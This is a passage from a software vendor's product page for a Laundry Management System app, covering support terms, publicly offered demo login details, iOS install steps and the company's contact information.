    \- As per your requirement, project will be completed within 20-25 days or earlier.  
    \- Bulk SMS, Payment Gateway, Apple App Store, Google Map API & Play Store Console charges you will have to pay, if you are require.
    
*   Service and Support ?
    
    Ans : We will provide a FREE technical support upto one year after purchase LMS Application. We will answer your question regarding website management, technical details or anything about operating your own website; we can provide this through remotly in 24x7 Hours.
    

**Free Trail Full Version**

Not required fill any personal information or credit card details just click on button and login it

Username : admin  
Password : 1234  
\[ Admin Login Details \]

  
Best view in Desktop or Laptop

Mobile : 8767228990  
Password : 1983  
\[ Demo User Login Details \]

  
Best view in Desktop or Laptop

User Mobile : 8767228990  
Driver Mobile : 1234567890  
\[ Demo User / Driver Login Details \]

   
iOS app install : Download and Extract zip in Mac-OS then drag-drop .app file on Xcode 10+ simulator or connected iphone {iOS v10.0+}.

**Contact**

You can call to us 24x7 regarding Laundry Management System enquiry or solutions

**Location:**

B-02, Sai Sanklap Complex, Survey No. 145/0,  
Usarli Khurd, Panvel, Mumbai, India 410206

**Call:**

Mobile : +91 87672 28990.  
Whatsapp : +91 87672 28990.  
Skype : rpcits2013 / +918767228990.

Tag

#java